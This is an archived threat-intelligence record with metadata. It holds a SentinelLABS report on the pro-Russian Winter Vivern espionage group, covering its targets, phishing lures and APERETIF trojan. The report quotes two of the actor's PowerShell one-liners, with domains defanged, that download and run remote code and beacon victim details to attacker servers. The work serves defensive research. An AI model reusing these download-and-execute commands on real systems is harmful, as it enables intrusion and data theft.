{
	"id": "8b931d55-0fc3-4230-a6be-51ddb66f8cc5",
	"created_at": "2026-04-06T00:11:17.813921Z",
	"updated_at": "2026-04-10T03:30:21.354056Z",
	"deleted_at": null,
	"sha1_hash": "caf6edfe587677a28840c3d8eab2b3480e08c052",
	"title": "Winter Vivern | Uncovering a Wave of Global Espionage",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2846365,
	"plain_text": "Winter Vivern | Uncovering a Wave of Global Espionage\r\nBy Tom Hegel\r\nPublished: 2023-03-16 · Archived: 2026-04-05 16:17:21 UTC\r\nExecutive Summary\r\nSentinelLABS has conducted an investigation into Winter Vivern Advanced Persistent Threat (APT) activity,\r\nleveraging observations made by the Polish CBZC and Ukraine CERT. Our research has uncovered a previously\r\nunknown set of espionage campaigns and targeting activities conducted by this threat actor.\r\nOur analysis indicates that Winter Vivern’s activities are closely aligned with global objectives that support the\r\ninterests of Belarus and Russia’s governments. The APT has targeted a variety of government organizations, and in a\r\nrare instance, a private telecommunication organization.\r\nThe threat actor employs various tactics, such as phishing websites, credential phishing, and deployment of malicious\r\ndocuments, that are tailored to the targeted organization’s specific needs. This results in the deployment of custom\r\nloaders and malicious documents, which enable unauthorized access to sensitive systems and information.\r\nBackground on Winter Vivern\r\nThe Winter Vivern Advanced Persistent Threat (APT) is a noteworthy yet relatively underreported group that operates with\r\npro-Russian objectives. DomainTools initially publicized the group in early 2021, naming it based on an initial command-and-control beacon URL string “wintervivern,” which is no longer in use. Subsequently, Lab52 shared additional analysis\r\nseveral months later, identifying new activity associated with Winter Vivern.\r\nThe group has avoided public disclosure since then, until recent attacks targeting Ukraine. A part of a Winter Vivern\r\ncampaign was reported in recent weeks by the Polish CBZC, and then the Ukraine CERT as UAC-0114. 
In this activity,\r\nCERT-UA and the CBZC collaborated on the release of private technical details which assisted our research in identifying a\r\nwider set of activity by the threat actor, in addition to new victims and previously unknown specific technical details.\r\nOverall, we find that the Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope\r\nof their attacks. Our analysis indicates that Winter Vivern activity aligns closely with global objectives that support the\r\ninterests of Belarus and Russia’s governments.\r\nTargeted Organizations\r\nOur analysis of Winter Vivern’s past activity indicates that the APT has targeted various government organizations since\r\n2021, including those in Lithuania, India, the Vatican, and Slovakia.\r\nRecently linked campaigns reveal that Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of\r\nForeign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. Of particular interest is\r\nthe APT’s targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing\r\nwar.\r\nThe threat actor’s targeting of a range of government and private entities highlights the need for increased vigilance as their\r\noperations include a global set of targets directly and indirectly involved in the war.\r\nLuring Methodology\r\nhttps://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/\r\nPage 1 of 6\n\nWinter Vivern’s tactics have included the use of malicious documents, often crafted from authentic government documents\r\npublicly available or tailored to specific themes. 
More recently, the group has utilized a new lure technique that involves\r\nmimicking government domains to distribute malicious downloads.\r\nIn early 2023, Winter Vivern targeted specific government websites by creating individual pages on a single malicious\r\ndomain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of\r\nForeign Affairs, and the Security Service of Ukraine.\r\nMalicious Page Mimicking cbzc.policja.gov.pl\r\nIn mid-2022 the attackers also made an interesting, less commonly observed, use of government email credential phishing webpages.\r\nOne example is ocspdep[.]com, which was used in targeting users of the Indian government’s legitimate email service\r\nemail.gov.in.\r\nemail.gov.in Login Page\r\nLooking back at less recent activity, we can see in December 2022 the group likely targeted individuals associated with the\r\nHochuzhit.com (“I Want to Live”) project, the Ukraine government website offering guidance and instructions to Russian\r\nand Belarus Armed Forces seeking to voluntarily surrender in the war. 
In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.\r\nWhen the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends\r\nto rely on shared toolkits, and the abuse of legitimate Windows tools.\r\nView Into The Arsenal\r\nWinter Vivern APT falls into a category of scrappy threat actors, being quite resourceful and able to accomplish a lot with\r\npotentially limited resources while willing to be flexible and creative in their approach to problem-solving.\r\nRecent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as\r\nvirus scanners to prompt downloads of malware from attacker-controlled servers.\r\nFake Virus Scan Loaders\r\nIn the case of malicious documents, such as the Hochu Zhit themed XLS files, PowerShell is called through a macro.\r\nSpecifically, the Invoke-Expression cmdlet is executed, beaconing to the malicious destination of ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php.\r\npowershell.exe -noexit -c \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};\r\niex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')\"\r\nOne malware family seen in recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the\r\nsample. We identified a related sample following similar use, although it is less complete in malicious design. These samples\r\nalign with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script\r\nloaders. Known samples are PE32 executables, written in Visual C++, with a compilation timestamp of May 2021. 
We\r\nassess the threat actor shifted from these original executables to the delivery of batch files with PowerShell scripting, with\r\noverlap in their use.\r\nf39b260a9209013d9559173f12fbc2bd5332c52a C:\\Users\\user_1\\source\\repos\\Aperitivchick\\Release\\SystemProtector.pdb\r\na19d46251636fb46a013c7b52361b7340126ab27 C:\\Users\\user_1\\source\\repos\\Aperitivchick 2\\Release\\SystemProtector.pdb\r\nAPERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound to the actor-controlled domain marakanas[.]com. As with the previous script, the trojan makes use of whoami within PowerShell in\r\nits initial activity to beacon outbound for further instructions and/or downloads.\r\nactor-controlled.exe -c \"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\r\n$a=whoami;\r\niex (New-Object Net.WebClient).DownloadString(\"\"\"hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=\r\nAPERETIF also uses the signatures.php?id=1 URI through HTTPS GET requests. The group made use of compromised\r\nWordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the\r\ndownload location for APERETIF during initial attack stages.\r\nMoreover, Winter Vivern employs other intrusion techniques, such as exploiting application vulnerabilities to compromise\r\nspecific targets or staging servers. 
An attacker-controlled server was found to host a login page for the Acunetix web\r\napplication vulnerability scanner, which may serve as a supplementary resource for scanning target networks and is potentially\r\nused to compromise WordPress sites for malware hosting purposes.\r\nAcunetix Vulnerability Scanner Login\r\nConclusion\r\nThe Winter Vivern cyber threat actor, whose operations of espionage have been discussed in this research, has been able to\r\nsuccessfully carry out their attacks using simple yet effective attack techniques and tools. Their ability to lure targets into the\r\nattacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and\r\nstrategic intent in their operations. The dynamic set of TTPs and their ability to evade the public eye has made them a\r\nformidable force in the cyber domain.\r\nIndicators of Compromise\r\nSource: 
https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA",
		"MISPGALAXY"
	],
	"references": [
		"https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/"
	],
	"report_names": [
		"winter-vivern-uncovering-a-wave-of-global-espionage"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434277,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/caf6edfe587677a28840c3d8eab2b3480e08c052.pdf",
		"text": "https://archive.orkl.eu/caf6edfe587677a28840c3d8eab2b3480e08c052.txt",
		"img": "https://archive.orkl.eu/caf6edfe587677a28840c3d8eab2b3480e08c052.jpg"
	}
}